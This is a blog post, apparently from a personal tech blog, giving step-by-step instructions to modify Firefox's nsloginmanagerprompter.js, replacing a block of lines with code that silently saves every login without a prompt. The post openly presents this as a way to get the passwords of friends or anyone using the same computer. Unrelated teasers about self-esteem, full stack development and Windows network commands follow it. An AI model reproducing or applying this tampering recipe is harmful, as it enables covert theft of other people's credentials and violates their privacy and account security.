Skip to main content

How To Hack Firefox To Auto Save Password Without Notification

 
Its a simple Firefox hack which helps you to hack your friends easily. When ever you try
to login in any account,firefox shows a notification asking for store user name and password
for this website. But after using this trick it will never ask to store the password but it 
would automatically store all the password. Its ideal trick if you want to get someones login 
details who uses your computer.
 
Step To Do This Firefox Hack  
 
1) First you need to close firefox.

2) Now locate the nsloginmanagerprompter.js which is normally found in
C:\ProgramFiles\MozillaFirefox\Components\
3) Open nsloginmanagerprompter.js with notepad ++
4) Replace the entire line 804 to 869 with the following code

var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);

When you've done that "save as" to your desktop, then drag back in to 
the original folder and replace the file.
 
To see the usernames + passwords you need to click on tools at the top 
of your browser and go to page info then security.

They will be saved into the saved passwords section. 
Enjoy And donot forget to comment!!!!!!!!!!!!!!!!!!!!

Comments

Popular posts from this blog

I am trying to be more Self-Esteemed............

  Here are some steps that  I am trying to boost my self-esteem......... 1. Focus your attention always on your potentials,   talents and abilities and not on your limitations and failures.   We all have enough potentials and qualities to live a happy, fulfilled life. We need to know who we really are. When we think of our strengths, of things that we can do extremely well and of our many achievements our self-esteem. boosts up.     When we gain   new skills and new knowledge   it gives us more self-confidence. We have no limitations; never impose limits on our potentials, on our ability to learn and grow. We must allow our creative and innovative enthusiasm to flower beyond all limits and space.     Failures will always be there. Transform your limitations and failures into   opportunities for you to grow and develop   your qualities. Believe that you are full of possibilities and not a bun...

Full Stack Developer. Are you one?

Primitively in Software industry software developers worked on particular part of the applications. Now from a layman point of view, a software application basically have three parts. The storage. The Computation.  The Output.  Now to develop that software we developers divide it in to mainly three layers.  Backend Or Database layer.  Middle layer.  User Interface or Output layer.  Now we can reconfigure this above structure with various terms and concepts and coats.  So, Full Stack Developer is the dev who have the capacity or knowledge to work in all this layers.  Thats means he is capable enough to deliver a full software with out taking help from anyone. Also taking consideration of the industry progression, A FULL STACK DEVELOPER should also know to build Software's for various platforms viz. Desktops, Web, Mobile, etc. Means he should be technically strong enough to work in Cross Platforms.   Please comm...

Very useful IP COMMANDS IN DOS

To get to the command prompt in Windows XP go to: Start, Run and in the empty box type cmd and then hit the enter key Display Connection Configuration: ipconfig /all Display DNS Cache Info Configuration: ipconfig /displaydns Clear DNS Cache: ipconfig /flushdns Release All IP Address Connections: ipconfig /release Renew All IP Address Connections: ipconfig /renew Re- Register the DNS connections: ipconfig /registerdns Display DHCP Class Information: ipconfig /showclassid Change/Modify DHCP Class ID: ipconfig /setclassid Network Connections: control netconnections Network Setup Wizard: netsetup.cpl Test Connectivity: ping www.google.com Trace IP address Route: tracert Displays the TCP/IP protocol sessions: netstat Display Local Route: route Display Resolved MAC Addresses: arp Display Name of Computer Currently on: hostname ANSI.SYS : Defines functions that change display graphics, control cursor movement, and reas...